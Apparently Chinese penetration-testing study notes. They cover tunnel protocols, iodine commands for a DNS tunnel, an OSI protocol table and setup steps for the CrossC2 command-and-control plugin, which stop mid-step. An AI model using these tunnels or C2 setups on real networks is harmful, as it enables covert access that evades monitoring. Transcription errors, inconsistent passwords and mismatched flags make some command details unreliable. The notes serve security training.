1.四大隧道协议
(1)SMB协议 判断:445端口是否开放
(2)ICMP协议 判断:ping命令能通说明使用icmp协议
(3)DNS协议
判断:nslookup www.baidu.com 属于UDP
iodine工作原理是 ,通过TAP虚拟网卡,在服务端建立起一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网。在客户端和服务端之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡。
服务器:设置密码xiaed:并创建虚拟IP及绑定域名指向iodined -f -c -p xiaodi 192.168.0.1 ns1.xiaodi8.com -DD设置密码xiaed:并创建虚拟IP及绑定域名指向
设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向
-f:在前台运行
-c:禁止检查所有传入请求的客户端IP地址。
-P:客户端和服务端之间用于验证身份的密码。
-D:指定调试级别,-DD指第二级。"D"的数量随级别增加。
客户端:连接密码x1aed:并绑定域名指向
iodine -f -N 200 -P xiaodi ns1.xiaodi8.com
尝试通讯尝试连接:
ssh root@192.168.0.2
(4)SSH协议
2.七层协议对应的协议
|-------|--------------------------------------------------------------|
| 应用昙 | HTTP、SMTP、SNMP、FTP、TeInet、SIP、SSH、NFS、RTSP、XMPP、Whois、 ENRP等 |
| 表示层 | XDR、ASN、SMB、AFP、NCP等 |
| 会话层 | ASAP、SSH、RPC、NetBIOS、ASP、Winsock、BS0 Sockets等 |
| 传输层 | TCP、UDP、TLS、RTP、SCTP、SPX、ATP等 |
| 网络层 | IP、ICMP、IGMP、IPX、BGP、OSPF、RUP、IGRP、EIGRP、ARP、RARP、X25等 |
| 数据链路层 | 以太网、令牌环、HDLC、频中继、ISDN、ATM、IEEE802.11、FDD1,PPP等 |
| 物理层 | 光缆、网线、无线电等 |
3.控制上线
插件:https://github.com/gloxec/CrossC2
面向Linux Mac IOS Android系统上线支持
目前版本只支持反向的https和正向的tcp
(1)下载对应版本加载器和CNA插件
(2)上传加载器文件和本地加载CNA插件
(3)修改CNA插件配置路径及上传Key文件
(4)使用命令或插件绑定HTTPS监听器生